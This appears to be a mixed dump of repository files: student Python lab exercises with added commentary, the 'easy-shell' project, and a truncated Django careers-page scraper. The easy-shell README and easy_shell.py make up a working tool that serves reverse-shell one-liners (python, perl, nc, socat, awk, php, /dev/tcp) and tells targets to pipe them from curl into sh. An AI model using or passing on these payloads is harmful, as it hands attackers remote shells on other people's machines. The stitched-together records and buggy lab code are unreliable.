"text": "# ECOR 1051 Lab 12 File: lab12-linearRegression.py\r\n\r\nfrom typing import Set, Tuple\r\n# See Practical Programming, Chapter 8, section Type Annotations For Lists,\r\n# and Chapter 11, first paragraph of section Creating New Type Annotations. \r\n\r\ndef get_points() -> Set[Tuple[float, float]]:\r\n \"\"\"Return a set of (x, y) points.\r\n >>> get_points()\r\n {(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)}\r\n >>> samples = get_points()\r\n\r\n >>> len(samples) # How many tuples (points) are in the set?\r\n 3\r\n >>> samples\r\n {(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)}\r\n \"\"\"\r\n return {(1.0, 5.0), (2.0, 8.0), (3.5, 12.5)}\r\n\r\n\r\ndef fit_line_to_points(points:Set[Tuple[float,float]]) -> Tuple[float,float]:\r\n \"\"\"Takes a set of x,y coordinates and returns the gradient and y intersect of the line of best fit\r\n >>>fit_line_to_points({(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)})\r\n 3.0, 2.0\r\n >>>fit_line_to_points({(4.6,4.3,),(7.8,1.5)})\r\n -0.8749999999999962, 8.324999999999974\r\n \"\"\"\r\n sumx = 0\r\n sumy = 0\r\n n = 0\r\n sumxy = 0\r\n sumxx = 0\r\n for i in points:\r\n sumx += i[0]\r\n sumy += i[1]\r\n n += 1\r\n sumxy += i[0]*i[1]\r\n sumxx += i[0]**2\r\n m = (sumx * sumy - n * sumxy)/(sumx * sumx - n * sumxx)\r\n c = (sumx * sumxy - sumxx * sumy)/(sumx * sumx - n * sumxx)\r\n return m, c\r\n\r\n\r\ndef best_line(file:str) -> str:\r\n \"\"\"Returns the equation of the line of best fit using data read from a file\"\"\"\r\n x = input(\"Input file name:\")\r\n (m, c) = fit_line_to_points(read_points(x))\r\n final = 'best line is y = ', str(m), 'x + ', str(c)\r\n return ''.join(final)\r\n\r\n\r\ndef read_and_print_lines() -> None:\r\n \"\"\"Reads and prints data from a separate file\"\"\"\r\n infile = open('lab12-data.txt', 'r')\r\n for line in infile:\r\n print(line)\r\n infile.close()\r\n\r\n\r\ndef read_points(filename:str) -> Set[Tuple[float,float]]:\r\n \"\"\"Reads data from a separate file and converts them into 2 float points\"\"\"\r\n infile = open(filename, 'r')\r\n points = {1}\r\n for line in infile:\r\n s = line.split()\r\n nums = (float(s[0]), float(s[1]))\r\n points.add(nums)\r\n infile.close()\r\n points.remove(1)\r\n return points\r\n\r\n\r\ntest = best_line('lab12-data.txt')\r\nprint(test)"
},
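fit_line_to_points in lab12 implements the least-squares normal equations m = (Σx·Σy − n·Σxy) / ((Σx)² − n·Σx²) and c = (Σx·Σxy − Σx²·Σy) / ((Σx)² − n·Σx²). For the sample set {(1,5), (2,8), (3.5,12.5)} the sums are Σx = 6.5, Σy = 25.5, Σxy = 64.75, Σx² = 17.25, so m = (165.75 − 194.25) / (42.25 − 51.75) = 3.0 and c = 2.0, matching the docstring. (Incidentally, read_points could start from an empty set() rather than seeding {1} and removing it.) NumPy's polyfit gives an independent cross-check; polyfit is standard NumPy, not part of the lab code:

    import numpy as np

    xs, ys = [1.0, 2.0, 3.5], [5.0, 8.0, 12.5]
    m, c = np.polyfit(xs, ys, 1)    # degree-1 least-squares fit: [slope, intercept]
    assert abs(m - 3.0) < 1e-9 and abs(c - 2.0) < 1e-9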
{
"alpha_fraction": 0.459090918302536,
"alphanum_fraction": 0.6176136136054993,
"avg_line_length": 20.463415145874023,
"blob_id": "5ed7c46d720069d21555655f233a4bc07e4bf37a",
"content_id": "e5377b9505231160b61f6bf37f0283623af8954d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1760,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 82,
"path": "/lab4.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\n\n# excersise 1\n\ndef area_of_disk(radius):\n \"\"\"Return the area of a disk with the specified non-negative radius\n >>> area_of_disk(5)\n 78.53981633974483\n >>> area_of_disk(11)\n 380.132711084365\n >>>area_of_disk(0)\n 0\n \"\"\"\n return math.pi * radius ** 2\n\n\narea = area_of_disk(5)\nprint(area)\narea = area_of_disk(5.0)\nprint(area)\n\n\n# excersise 2\n\ndef distance(x1, y1, x2, y2):\n \"\"\"Return the distance between 2 points with the difference between the x values and the y values of the 2 points\n >>> distance(4,5,1,1)\n 5.0\n >>> distance(3,2,4,6)\n 4.123105625617661\n >>> distance(6,7,1,2)\n 7.0710678118654755\n >>>distance(1,1,0,0)\n 1.4142135623730951\n \"\"\"\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ntest = distance(5, 4, 0, 0)\nprint(test)\n\n\n# excersise 3\n\ndef area_of_circle(x1, y1, x2, y2):\n \"\"\"Returns the area of a circle with a radius given by the distance between 2 points.\n >>>area_of_circle(4,5,1,1)\n 78.53981633974483\n >>>area_of_circle(1,2,3,4)\n 25.132741228718345\n >>>area_of_circle(6,7,1,2)\n 157.07963267948966\n >>>area_of_circle(1,1,1,1)\n 0\n \"\"\"\n return math.pi * ((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ntest = area_of_circle(8, 2, 7, 1)\nprint(test)\n\n\n# excersise 4\n\ndef height(ladder, angle):\n \"\"\" Returns the vertical height that the ladder covers when placed against the wall using the length of the ladder\n in meters and the angle from the floor to the ladder in degrees.\n >>>height(math.sqrt(2),45)\n 1\n >>>height(1.3,34)\n 0.726950774511971\n >>>height(2.4,66)\n 2.192509098342242\n >>>height(1.9,87)\n 1.8973961160336903\n \"\"\"\n return ladder * math.sin(math.radians(angle))\n\n\ntest = height(1.3, 57)\nprint(test)\n"
},
{
"alpha_fraction": 0.413654625415802,
"alphanum_fraction": 0.4538152515888214,
"avg_line_length": 12.1578950881958,
"blob_id": "809b37a418fbbe842c479a1f6e1e576bdbf06844",
"content_id": "177c7dab18921673bc31b617631280e7564c06c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 19,
"path": "/lab11.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 2:\n\n\ndef average(l:list) -> list:\n total = 0\n for i in l:\n for x in i:\n total += x\n avg = total/3\n print(avg)\n \n return l\n\n\ntest = average([(1, 2, 3), (4, 5, 6)])\nprint(test)\n\n\n# exercise 4:"
},
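The lab11 average keeps one running total across all tuples and divides by a hard-coded 3, then returns the input unchanged, so average([(1, 2, 3), (4, 5, 6)]) prints 2.0 and 7.0 instead of each tuple's mean; summing each tuple and dividing by its own length gives the intended result:

    def average(l: list) -> list:
        # mean of each inner tuple, from its own sum and its own length
        return [sum(t) / len(t) for t in l]

    assert average([(1, 2, 3), (4, 5, 6)]) == [2.0, 5.0]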
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.7298136353492737,
"avg_line_length": 25.75,
"blob_id": "bd7ffb94cbb945910e1175b4ac7de80c64b2a490",
"content_id": "0e39fc8a851f49b59f44721eb429e28272fe138f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 12,
"path": "/lab3ex2.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "\n\nLITRES_PER_GALLON = 4.54609\nKMS_PER_MILE = 1.60934\n\ndef convert_to_litres_per_100_km(mpg):\n return (mpg*KMS_PER_MILE)/(LITRES_PER_GALLON*100)\n\nlp100km = convert_to_litres_per_100_km(32)\nprint(lp100km)\nlp100km = convert_to_litres_per_100_km(0)\nprint(lp100km)\nlp100km = convert_to_litres_per_100_km(32.0)\nprint(lp100km)"
}
] | 13 |
linuxl0s3r/easy-shell
|
https://github.com/linuxl0s3r/easy-shell
|
a7a68386295faacc7b1bdb65b6594c6d437cc8ba
|
26fe0638820c996825ff381454bcc8f84d022667
|
151925a52f21f3c92758d84834429773b335a05f
|
refs/heads/main
| 2023-01-30T15:13:53.780198 | 2020-12-13T14:27:35 | 2020-12-13T14:27:35 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6659107804298401,
"alphanum_fraction": 0.7052153944969177,
"avg_line_length": 21.066667556762695,
"blob_id": "edc7bad82968d66af4a7c60cc2db45dcd9800380",
"content_id": "4de0615c0bf4a55bfe6b4485534eaa6fe46dad28",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 60,
"path": "/README.md",
"repo_name": "linuxl0s3r/easy-shell",
"src_encoding": "UTF-8",
"text": "# easy-shell\n\nA pure Python script to easily get a reverse shell.\n\n### How it works?\n\nAfter sending a request, it generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).\n\n### Example\n\n##### Attacker machine\n```\n$ whoami\nattacker\n\n$ nc -l 8080\nsh-4.4$ whoami\ncentos\nsh-4.4$ pwd\n/home/centos\n```\n\n##### Target machine\n```\n$ whoami\ntarget\n\n$ curl http://easy-shell.xyz/192.168.0.52:8080 | sh\n```\n\n### Running the server\n\nEdit the following lines on ```easy_shell.py``` according to your needs:\n\n```\nPORT = 8080\nDOMAIN = \"http://127.0.0.1:{}\".format(str(PORT))\n\nHTTPS = False\nKEY_FILE = \"keyfile.key\"\nCERT_FILE = \"certfile.cert\"\n```\n\nIf you want to run it over HTTPS, execute the following commands:\n\n```\n$ openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key\n$ openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert\n```\n\n### Used modules\n\n- [ssl](https://docs.python.org/3/library/ssl.html#module-ssl)\n- [http.server](https://docs.python.org/3/library/http.server.html#module-http.server)\n- [socketserver](https://docs.python.org/3/library/socketserver.html#module-socketserver)\n- [urllib.parse](https://docs.python.org/3/library/urllib.parse.html#module-urllib.parse)\n\n### License\n\nThis project is licensed under the 3-Clause BSD License."
},
{
"alpha_fraction": 0.6316016316413879,
"alphanum_fraction": 0.6456132531166077,
"avg_line_length": 38.99137878417969,
"blob_id": "493db3b4f1c7bea45fc22a87247ce51c61a5eede",
"content_id": "c8e40aee6923e993ca48445ed57cfd305e5ea002",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4639,
"license_type": "permissive",
"max_line_length": 268,
"num_lines": 116,
"path": "/easy_shell.py",
"repo_name": "linuxl0s3r/easy-shell",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright 2020 Cristian Souza\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nHOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\nTO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport ssl\nimport http.server\nimport socketserver\nfrom urllib.parse import urlparse\n\nPORT = 8080\nDOMAIN = \"http://127.0.0.1:{}\".format(PORT)\n\nHTTPS = False\nKEY_FILE = \"keyfile.key\" # openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key\nCERT_FILE = \"certfile.cert\" # openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert\n\nUSAGE = \"\"\"# Usage\n# Attacker: nc -l port\n# Target: curl {}/ip:port | sh\\n\"\"\".format(DOMAIN)\n\n\ndef is_valid(host_port):\n \"\"\"Checks if there are a host and a port.\"\"\"\n\n if len(host_port.split(\":\")) != 2:\n return False\n\n return True\n\ndef generate_sh(host_port):\n \"\"\"Generates different payloads.\"\"\"\n\n host, port = host_port.split(\":\")\n\n commands = {\n \"python\" : \"python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\\\"{}\\\", {})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\".format(host, port),\n \"perl\" : \"perl -e 'use Socket;$i=\\\"{}\\\";$p={};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};'\".format(host, port),\n \"nc\" : \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f\".format(host, port),\n \"socat\" : \"socat tcp-connect:{}:{} system:/bin/sh\".format(host, port),\n \"awk\" : \"awk 'BEGIN {{s = \\\"/inet/tcp/0/{}/{}\\\"; while(42) {{ do{{ printf \\\"$ \\\" |& s; s |& getline c; if(c){{ while ((c |& getline) > 0) print $0 |& s; close(c); }} }} while(c != \\\"exit\\\") close(s); }}}}' /dev/null\".format(host, port),\n \"php\" : \"php -r '$sock=fsockopen(\\\"{}\\\",{});exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\".format(host, port),\n \"sh\" : \"/bin/sh -i >& /dev/tcp/{}/{} 0>&1\".format(host, port)\n }\n\n payload = \"\"\"# Usage\n# Attacker: nc -l {2}\n# Target: curl {0}/{1}:{2} | 
sh\\n\"\"\".format(DOMAIN, host, port)\n\n for key, value in commands.items():\n # Checks whether the command exists. If so, executes the payload.\n payload += \"\"\"\nif command -v {} > /dev/null 2>&1; then\n {}\n exit;\nfi\\n\"\"\".format(key, value)\n\n return payload\n\nclass HttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"HTTP request handler.\"\"\"\n\n def do_GET(self):\n \"\"\"Returns the payload or usage information;\"\"\"\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n\n host_port = urlparse(self.path).path[1:]\n if is_valid(host_port):\n self.wfile.write(bytes(generate_sh(host_port), \"utf8\"))\n return\n\n self.wfile.write(bytes(USAGE, \"utf8\"))\n\n return\n\ndef main():\n \"\"\"Main function.\"\"\"\n\n handler_object = HttpRequestHandler\n server = socketserver.TCPServer((\"\", PORT), handler_object)\n if HTTPS:\n server.socket = ssl.wrap_socket(server.socket, server_side=True,\n keyfile=KEY_FILE, certfile=CERT_FILE)\n server.serve_forever()\n\nif __name__ == \"__main__\":\n main()\n"
}
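easy_shell.py secures its listener with ssl.wrap_socket, which was deprecated in Python 3.7 and removed in 3.12; the supported SSLContext route slots in as a sketch like the following (key and certificate names follow the script's KEY_FILE/CERT_FILE constants, and the files must exist as the README's openssl commands describe):

    import ssl

    # replacement for ssl.wrap_socket(server.socket, server_side=True, ...)
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(certfile="certfile.cert", keyfile="keyfile.key")
    # server.socket = context.wrap_socket(server.socket, server_side=True)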
] | 2 |
venkateshmoback/spider
|
https://github.com/venkateshmoback/spider
|
422521c553a8186e5a060a938e754b3b0e904c6a
|
cee953909cba00984a8bbb366ea726a34f831c02
|
d8ca802b05634d29237fce23fe77959044ab089a
|
refs/heads/master
| 2020-06-11T19:16:21.234879 | 2019-06-27T09:06:34 | 2019-06-27T09:06:34 | 194,058,691 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3644377887248993,
"alphanum_fraction": 0.3804927468299866,
"avg_line_length": 40.54163360595703,
"blob_id": "deba5f0f5bd7ca1f3604a2ebcf10c59747528e12",
"content_id": "3a314dcaeb6ad5c0507e7d014804c0e461683cfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51386,
"license_type": "no_license",
"max_line_length": 359,
"num_lines": 1237,
"path": "/django/spiderapp/views.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\nimport requests\nfrom bs4 import BeautifulSoup as sp\nimport time\nfrom bs4 import BeautifulSoup as soup\nimport ssl\nimport traceback\nimport shutil\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nimport urllib.request\n\nimport pandas as pd\nimport json\nimport argparse\nfrom pymongo import MongoClient\nimport json\nfrom spiderapp.forms import HomePage\n\nCOMPANY_LIST = dict()\n# Create your views here.\n\nclass HomePageView(TemplateView):\n\n\tdef __init__(self):\n\t\t\n\n\t#Adding hosting addres to the carrier page \n\n\t\tself.ebags='https://www.ebags.com'\n\t\tself.aetna='/search-jobs'\n\n\t\tself.lovesac='https://www.lovesac.com'\n\t\tself.rhone='https://www.rhone.com'\n\t\tself.altria='?src=leftnav'\n\t\tself.altria_1='http://www.altria.com'\n\t\tself.dell='https://jobs.delltechnologies.com'\n\t\tself.tableau='https://careers.tableau.com'\n\n\t\tself.arin='https://www.arin.net'\n\n\t\tself.accenture='https://www.accenture.com'\n\t\tself.jpcycles='https://www.jpcycles.com'\n\n\t\tself.gigaom='https://gigaom.com'\n\n\t\tself.zoomcare='https://www.zoomcare.com'\n\n\t\tself.walmart='https://careers.walmart.com'\n\n\t\tself.hsn='https://jobs.hsn.com'\n\t\tself.irs ='https://www.jobs.irs.gov'\n\n\t\tself.thinkchamp='http://www.thinkchamplin.com'\n\n\t\tself.lyondell='https://careers.lyondellbasell.com'\n\t\tself.lpl='https://careers.lpl.com'\n\t\tself.sbarro='https://sbarro.jobs.net'\n\t\tself.newscrop='https://newscorp.com'\n\t\tself.key='https://www.key.com'\n\n\t\tself.disney='https://jobs.disneycareers.com'\n\n\t\tself.warnermedia='https://www.att.jobs/'\n\n\t\tself.verizon='https://www.verizon.com'\n\n\t\tself.tapestry ='https://careers.tapestry.com'\n\n\t\tself.iac='https://www.iac.com'\n\n\t\tself.startribune='https://jobs.startribune.com'\n\n\t\tself.masco='https://jobs.masco.com'\n\t\tself.lazboy='http://jobs.jobvite.com'\n\n\t\tself.jiffymix='https://site.jiffymix.com/'\n\n\t\tself.spartanmash='https://careers.spartannash.com'\n\n\t\tself.starrett='http://www.starrett.com'\n\n\t\tself.manulife='https://jobs.manulife.com'\n\n\t\tself.fidelity='https://jobs.fidelity.com'\n\n\t\tself.yum='https://www.yum.com'\n\n\t\tself.rjcorman='https://wfa.kronostm.com/index.jsp'\n\n\t\tself.lexmark='https://www.lexmark.com'\n\n\t\tself.heavenhill='http://www.heavenhill.com'\n\n\t\tself.moback ='https://www.moback.com'\n\t#passing the job portal id's\n\n\tJobportal_initials = {\n\t 'tdxcorp': {\n\t 'search_link' : 'https://www.tdxcorp.com',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#mega-menu-item-754',\n\t 'title' : None,\n\t 'carrier_page_2' : None\n\t }\n\t }, \n\t \n\t 'ebags': {\n\t 'search_link' : 'https://www.ebags.com',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#footerCICareers',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t }, \n\t 'gartner': {\n\t 'search_link' : 'https://www.gartner.com/en',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.emt-container > footer > section > div > div.row.mg-t30.mg-b30 > div:nth-child(1) > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t }, \n\t \n\t 'lovesac': {\n\t 'search_link' : 'https://www.lovesac.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#page-container > footer > section > div.bpc-nav-links.footer-group-1 > a:nth-child(3)',\n\t 'title' : None,\n\t 'carrier_page_2' : 
'#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'rhone': {\n\t 'search_link' : 'https://www.rhone.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.global_footer-section-list:nth-child(1) > a:nth-child(4)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'ediblearrangements': {\n\t 'search_link' : 'https://www.ediblearrangements.com/edible-careers/edible-arrangements-careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.brnButton',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'altria': {\n\t 'search_link' : 'http://www.altria.com/people-and-careers/training/Pages/default.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'li.static:nth-child(3) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'redrobin': {\n\t 'search_link' : 'https://www.redrobin.com/careers/management-jobs.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.ide20407a9-26b5-48a8-acca-b68ef0c85c19 > a:nth-child(2)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'kaiseraluminum': {\n\t 'search_link' : 'http://www.kaiseraluminum.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > section.main > div > div > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'dell': {\n\t 'search_link' : 'https://jobs.delltechnologies.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section:nth-child(1) > ul > li:nth-child(1) > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'yokesfreshmarkets': {\n\t 'search_link' : 'https://www.yokesfreshmarkets.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-menu-menu-more > div > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'costargroup': {\n\t 'search_link' : 'https://www.costargroup.com/careers/research-opportunities',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#aplNowbtn',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tableau': {\n\t 'search_link' : 'https://careers.tableau.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#seeAllCareersBtn > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'safeboats': {\n\t 'search_link' : 'http://www.safeboats.com/company/careers.php',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > table > tbody > tr:nth-child(3) > td > table > tbody > tr:nth-child(2) > td.ContentZone-TopShadow > div:nth-child(10) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'darigold': {\n\t 'search_link' : 'https://www.darigold.com/contact/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div > div > main > section > div > div > div > p:nth-child(4) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'arin': {\n\t 'search_link' : 'https://www.arin.net/about/welcome/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main-con > div > div.right-rail.right-rail-wide > ul:nth-child(2) > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\n\t 'quest': {\n\t 'search_link' : 'https://www.quest.com/company/careers.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#overview > div > div.hero-cta.mt-30.mb-30.cta-container > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t 
}\n\t },\n\t \n\t 'accenture': {\n\t 'search_link' : 'https://www.accenture.com/in-en',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#primaryLink4_Careers > div:nth-child(1) > div:nth-child(1) > ul:nth-child(1) > li:nth-child(3) > ul:nth-child(3) > li:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'iridium': {\n\t 'search_link' : 'https://www.iridium.com/company-info/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#primaryLink4_Careers > div:nth-child(1) > div:nth-child(1) > ul:nth-child(1) > li:nth-child(3) > ul:nth-child(3) > li:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ionaudio': {\n\t 'search_link' : 'https://www.ionaudio.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.ion-footer-menu > ul:nth-child(3) > li:nth-child(3) > span:nth-child(1) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'jpcycles': {\n\t 'search_link' : 'https://www.jpcycles.com/motorcyclesuperstore?utm_source=mssrd',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.col_4_5_12 > ul:nth-child(2) > li:nth-child(7) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lancair': {\n\t 'search_link' : 'https://lancair.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-1650 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'gigaom': {\n\t 'search_link' : 'https://gigaom.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-960019 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'bpa': {\n\t 'search_link' : 'https://www.bpa.gov/careers/Pages/default.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#WebPartWPQ1 > ul > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'colheli': {\n\t 'search_link' : 'https://www.colheli.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#page-section-5 > div.page-section-content.vc_row-fluid.mk-grid > div.mk-padding-wrapper.wpb_row > div > div:nth-child(2) > div.wpb_column.vc_column_container.vc_col-sm-8 > div > div > div.vc_btn3-container.col-btn.vc_btn3-center > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'zoomcare': {\n\t 'search_link' : 'https://www.zoomcare.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#__layout > div > div.MainFooter > div:nth-child(4) > div > div > div > div > div > div:nth-child(6) > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'dobson': {\n\t 'search_link' : 'https://www.dobson.net/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-1864 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'columbiasussex': {\n\t 'search_link' : 'http://www.columbiasussex.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-120 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'deltaprivatejets': {\n\t 'search_link' : 'https://www.deltaprivatejets.com/about-delta-private-jets/#careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#careers > div > div > div > div > div > p:nth-child(4) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'siemens': {\n\t 'search_link' : 'https://new.siemens.com/global/en/company/jobs.html',\n\t 
